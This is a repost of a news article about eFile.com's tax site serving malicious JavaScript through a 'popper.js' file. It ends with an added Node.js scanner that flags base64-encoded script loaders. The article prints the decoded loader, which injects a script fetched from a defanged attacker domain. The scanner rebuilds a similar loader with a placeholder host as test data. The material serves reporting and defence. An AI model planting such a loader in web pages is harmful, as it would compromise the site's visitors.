IRS-authorized eFile.com tax return software caught serving JS malware

By Ax Sharma April 4, 2023 05:00 AM

If it was not already bad enough with the Banking issues going on

eFile.com, an IRS-authorized e-file software service provider used by many for filing their tax returns, has been caught serving JavaScript malware.

Security researchers state the malicious JavaScript file existed on the eFile.com website for weeks. BleepingComputer was able to confirm the existence of the malicious JavaScript file in question at the time.

Note, this security incident specifically concerns eFile.com and not IRS’ e-file infrastructure or identical sounding domains.

Just in time for tax season

eFile.com was caught serving malware, as spotted by multiple users and researchers. The malicious JavaScript file in question is called ‘popper.js’:
[Image: The ‘popper.js’ file used by eFile.com across its webpages contains malware (BleepingComputer)]

The development comes at a crucial time when U.S. taxpayers are wrapping up their IRS tax returns before the April 18th due date.

The highlighted code above is base64-encoded with its decoded version shown below. The code attempts to load JavaScript returned by infoamanewonliag[.]online:
s=document.createElement('script');
document.body.appendChild(s);
s.src='//www.infoamanewonliag[.]online/update/index.php?'+Math.random();

The Math.random() value appended to the URL is likely there to prevent caching, so that a fresh copy of the malware is loaded every time eFile.com is visited, should the threat actor make any changes to it. At the time of writing, the endpoint was no longer up.

BleepingComputer can confirm that the malicious JavaScript file ‘popper.js’ was being loaded by almost every page of eFile.com, at least up until April 1st.
[Image: eFile.com pages serving popper.js (BleepingComputer)]

As of today, the file is no longer seen serving the malicious code.

Website ‘hijacked’ over 2 weeks ago

On March 17th, a Reddit thread surfaced where multiple eFile.com users suspected the website was “hijacked.”

At the time, the website showed an SSL error message that, some suspected, was fake and indicative of a hack:

Article (https://www.bleepingcomputer.com/news/security/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware/)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”
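
A defender-side check for the pattern the article describes, as an added example that is not part of the original post or of BleepingComputer's analysis: it decodes base64 string literals found in a served script and flags any that build a script element pointing at a host outside an allowlist. The function name, the allowlist parameter, the sample strings and the `cdn.example.invalid` host are constructed assumptions.

```javascript
// Added example (Node.js). All sample data below is constructed.

// Candidate base64 literals: quoted runs of 24+ base64 characters.
const B64_LITERAL = /(['"`])([A-Za-z0-9+/]{24,}={0,2})\1/g;

// Traits of the decoded loader shown in the article.
const TRAITS = {
  createsScript: /createElement\(\s*['"]script['"]\s*\)/,
  remoteSrc: /\.src\s*=\s*['"](?:https?:)?\/\/([^/'"?]+)/,
  cacheBuster: /Math\.random\(\)|Date\.now\(\)/,
};

// Returns one finding per base64 literal that decodes to a remote script loader.
function scanScript(source, allowedHosts = []) {
  const findings = [];
  for (const m of source.matchAll(B64_LITERAL)) {
    const decoded = Buffer.from(m[2], 'base64').toString('utf8');
    // Skip blobs that do not decode to printable text (images, fonts, ...).
    if (!/^[\x09\x0a\x0d\x20-\x7e]+$/.test(decoded)) continue;
    const src = decoded.match(TRAITS.remoteSrc);
    const host = src ? src[1].toLowerCase() : null;
    if (!TRAITS.createsScript.test(decoded) || !host) continue;
    if (allowedHosts.includes(host)) continue;
    findings.push({
      offset: m.index,                               // where the literal sits in the file
      host,                                          // host the decoded code would load from
      cacheBuster: TRAITS.cacheBuster.test(decoded), // random query suffix, as in the article
      decoded,
    });
  }
  return findings;
}

// Constructed sample: a library file carrying an encoded loader of the same
// shape as the decoded snippet above, with a placeholder host.
const SAMPLE_LOADER =
  "s=document.createElement('script');document.body.appendChild(s);" +
  "s.src='//cdn.example.invalid/update/index.php?'+Math.random();";
const SAMPLE_TAMPERED =
  "function noop(){}\nvar d='" +
  Buffer.from(SAMPLE_LOADER).toString('base64') + "';\n";
// Constructed sample: a harmless base64 literal that must not be flagged.
const SAMPLE_CLEAN =
  "var icon='" + Buffer.from('x'.repeat(30)).toString('base64') + "';";

for (const f of scanScript(SAMPLE_TAMPERED)) {
  console.log(`offset ${f.offset}: encoded loader for ${f.host}`);
}
```

Run against first-party scripts in a build or deployment check, a finding on a file such as a vendored library is a reason to diff it against the upstream release.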